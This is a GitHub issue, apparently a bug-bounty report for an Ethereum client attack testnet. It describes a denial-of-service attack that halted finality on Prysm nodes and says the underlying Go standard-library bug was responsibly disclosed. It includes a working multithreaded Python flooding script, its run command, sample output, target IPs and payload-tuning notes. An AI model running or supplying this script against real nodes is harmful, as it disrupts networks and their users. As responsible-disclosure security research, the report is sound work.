Skip to content
This repository has been archived by the owner on Nov 20, 2021. It is now read-only.

[prysm-attack-0 Reward] DoS Attack on Prysm Stops Finality (RE-POST) #12

Closed
jrhea opened this issue Aug 6, 2020 · 0 comments
Closed

Comments

@jrhea
Copy link
Contributor

jrhea commented Aug 6, 2020

Quick Note

The success of this attack was due to a 9 year old bug in the Go standard library. During the "post-mortem" @protolambda, @prestonvanloon, @raulk and I uncovered this bug and opted to responsibly disclose the details to the golang security team. See the link below for more details:

https://groups.google.com/forum/#!msg/golang-announce/NyPIaucMgXo/GdsyQP6QAAAJ

As a part of the responsible disclosure process, I opted to delete this issue until the vulnerability could be fixed and a security patch released. The following is the original description of the attack (unaltered). Enjoy!

Description

Prysm nodes are vulnerable to a DoS attack that prevents them from participating in consensus.

Attack scenario

Three out of four Prsym nodes were targeted by 2 AWS t2.small machines with a sustained DoS attack.

Impact

The effect that the DoS attack had on the attacknet was a prolonged loss finality; however, the network was able to recover to a healthy state within a few epochs once the attack stopped. The nodes under attack demonstrated high CPU usage, a large amount of outbound traffic, trouble finding peers in subnets and one node's local clock had a time disparity causing issues importing blocks.

Details

Attack Procedure

This is the code that the two machines ran to prevent finality on the attacknet

#!/usr/bin/python3
import threading
import socket
import time
import sys

def worker(id,ip,port):
    while True:
      sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      sock.connect((ip,port))
      print("Worker {} connected".format(id))
      packet = bytes([255]*65536)
      sock.send(packet)
      time.sleep(20)
      sock.close()

if __name__ == "__main__":
    ip=sys.argv[1]
    port=int(sys.argv[2])
    num_threads=int(sys.argv[3])

    threads = []
    for i in range(num_threads):
        thread = threading.Thread(target=worker, args=(i,ip,port))
        threads.append(thread)
        thread.start()

The code is run as follows:

./prysm_attack.sh [IP] [PORT] [NUM_THREADS]

Here is some sample output from the attack run:

$ ./prysm_attack.sh  3.236.241.28 9000 500
Worker 0 connected
Worker 1 connected
Worker 2 connected
Worker 3 connected
Worker 4 connected
Worker 5 connected
Worker 6 connected
Worker 7 connected
Worker 8 connected
Worker 9 connected
Worker 10 connected
...
Worker 499 connected

To execute the attack, I targeted the following IP addresses with three processes - two processes on one machine and one process on the other.

18.183.12.240
3.127.134.103
34.237.53.47

Each process spawned 500 threads that enter an infinite loop that perform the following steps:

  1. connect to Prysm node
  2. sends a ~65KB payload

Note: the attack definitely works with payloads xFF, xFE, ... , but x00 causes Prysm to disconnect

  1. sleep for 20 seconds.

Note: the amount of time to sleep acts as a ratelimiter and is somewhat arbitrary, but experimentally it was lower than the Prysm node's timeout I noticed when using netcat.

When developing this attack, the first thing I attempted to do was use the same command that crashed Teku. Unfortunately, sending output from /dev/zero caused Prysm to immediately disconnect. Eventually, I found other payloads that would allow the connection to stay open (see above), but sending a large number of small packets (like I did to Teku) didn't seem as effective on Prysm. I switched to Python so I could tune the ratio better and found that a smaller number of large packets was more effective against Prysm.

Bytes-out

Packets-out

Keep in mind that the goal here was to just take down the network so the attack was designed using a symptomatic approach (i.e. trial and error) with little regard for root cause analysis. That would have taken a lot more time to isolate runs, document them and compare performance to other clients.

One important thing to note is that this attack does NOT seem to be effective against Lighthouse.

Attack Log

The attack lasted from Epoch 1843 - 1864. I should have stopped at Epoch 1860, but the Beacon Chain Explorer for the Prysm Attacknet became unresponsive 1 slot before Epoch 1860. As a result, I had to start a local Prysm node to verify that the attack was successful. By the time the node sync'd up, the Beacon Chain Explorer was back online and the attack lasted over 20 epochs.

Here are some screenshots from https://prysm-attack-0.beaconcha.in/ at the end of the attack:

participation-rate

network-deadness

blocks

Here is a screenshot of my local node showing that finality was prevented for more than 16 epochs:

victory

Recovery

Prysm's recovery from the attack was interesting to watch. Here are some screenshots from https://prysm-attack-0.beaconcha.in/ after the network recovered:

participation-rate-recovery

epochs-recovery

Here is a screenshot of my local node showing that Prysm recovered about 2 epochs after the attack ended:

recovery-log

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants